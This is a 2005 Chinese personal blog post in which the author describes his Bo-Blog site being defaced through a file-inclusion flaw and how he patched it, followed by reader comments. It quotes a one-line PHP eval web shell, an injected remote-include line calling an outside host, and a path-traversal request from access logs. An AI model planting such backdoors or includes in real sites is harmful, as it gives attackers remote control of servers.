首页 Soft PlugIn RAN乱 Dev开发 Info资料 English WAP 留言 登陆 注册
-
Posted by Yippee | 评论(1) | 引用(0) | 阅读1772次
20050615 我的BLOG被黑

网络上被黑的事情看着多了去,好像比较出名的LBLOG经常遇到这种问题,还诞生了一个分支 LBS,好像比较注重安全性质。我一向以为那些黑客盗亦有道,而且自己的这个只是一个个人的BLOG,记录一下自己的想法和看法,与世无争,与人无怨。应该不会有什么问题吧。

今天上午刚刚写完MCAFEE和ALEXA工具条BLOG,结果又被抓去调试程序,匆匆看了一下,大约138个注册用户了,下午一直都在调试程序,那台破三星传真机 ,等到快下班的时候仍然是如此,晕头转向的回来一看,BLOG的首页已经被人改了:<?require "http://xhacker.xyii.com");?>

以前看到BOBLOG的公告:Bo-Blog 安全公告及补丁 [06-11] 普通注册用户可以利用程序的一处疏漏,伪装自己为副管理员。但是我一直还没有升级版本,用的是1.7.095,所以也没有在意,这几天一直有意识的访问BO-BLOG,但是今天上午BO-BLOG无法访问。隐约觉得不好,但是也没有办法。

刚开始以为数据丢了,以为自己上午已经做了备份,调试程序头又大,又中午LP电话说儿子感冒,急着回家,于是直接进入后台导入数据,发现仍然不对。

晚上回家,儿子睡的很香,于是静心看看情况,感觉好像只是首页被改了,不是数据丢失,而由于自己的急性子反而丢失了一点数据,WWW.BO-BLOG.COM 可以访问了,Bo-Blog 安全公告及补丁 [06-11] 赶快下载了 补丁包,结果好像还是不行,只好一不做二不休,干脆升级BLOG,再打最新的 patch20050613.rar ,终于又可以访问了,又重新按照自己的情况修改模板。补上BLOG。终于完工。

http://xhacker.xyii.com 里面看到EMAIL地址QinNi at EvilOctal dot Com,找到 http://www.eviloctal.com/ 又转到http://www.eviloctal.com/weblog/index.php,看到 bo-blog index.php include任意php文件漏洞 

由于自己一直都是做应用软件,所以最多是导致程序运行失败,出现非法错误,所以对于这些东西不是很熟悉,看来以后也要了解一些了。

根据他的说明:在后台管理 禁止选项 禁止搜索的词 无意义词 发现 木马 <?php eval($_POST[cmd])?>,自己下载一个 lanker微型PHP后门客户端2.0 试验了一下,的确发现可用,不过BO-BLOG 1000多个文件,不知道还有没有哪里藏着一个?

有位仁兄真有干劲:

来访时间 来访IP 来自 访问页 来路页
2005-06-15 22:05:45 222.90.105.254 中国网通用户 /blog/index.php?job=../admin/cha... 直接输入地址 
2005-06-15 22:05:41 222.90.105.254 中国网通用户 /blog/ http://www.baidu.com 

http://www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=powered by bo%2Dblog&pn=80&cl=3 他搜索 POWER BY BO-BLOG看来 BOBLOG是不是可以考虑采用图片的形式,我的BLOG已经在搜索结果排到了第九页,他也还是找过来了。 


字体:

Permanant URI永久地址 http://www.shengfang.org/blog/p/bloghack.php
Trackback URI引用地址 http://www.shengfang.org/blog/tb.php?tb_id=1118844210

2005年6月15日22:03星期三  [RAN乱] 追踪此文的RSS
我非我在 2005年6月16日10:03星期四 评论:
呵呵.这位兄台,qini可不是什么"仁兄"啊.西西.她可是个如假包换的mm哦..听说她最近腿刚摔断了.还不忘hack?真是精神可嘉.Emotion
其实她也没做什么破坏.充其量也只是提醒你一下安全罢了.
新漏洞出来的时候,hacker们一般都会疯狂一会,无目的的任意hack,别以为你的站对他们没有吸引力,光是能控制一台服务器就很让某些人兴奋一会子了.(当然秦尼不算).还好现在还是手工阶段.如果自动攻击工具出来,遭殃的人更多.事实上,目前我已经知道我们火狐有2样自动攻击工具出品了....
Yippee 回复于 2005年6月16日20:54
我说的仁兄应该不是她吧,网站被黑至少是在下午5:30以前,而那位仁兄是晚上10点以后。我看她QQ上的姓名是秦妮觉得象,可是看她的BLOG又觉得不像。我也说了是我自己太急,她只是修改了首页。她如果从我这个虚拟空间打入,能够控制这个服务器吗?本来想自己建站舒服点,现在想想伴个BSP会不会省心点?

称呼:    登陆   注册
   不注册,但记住我的信息
邮件:
(非必须)
评论: [UBB代码帮助]
粗体 斜体 下划线 链接 水平线 引用



验证码: 请输入你看见的数字
关闭UBB      提交时自动将内容复制到剪贴板

公告
Fire and Motion!

统计信息
[Yippee]||[统计]||日志:1790
在线: 8||用户: 2562 [列表]
今日:1930||到访:2671429
Rss:838375||评论:1584

最新日志

最新评论

友情链接

日历

最新引用

搜索

归档

杂项
Get RSS Feed (Version 2.0)
Get Atom Feed (Version 0.3)
编码:  UTF-8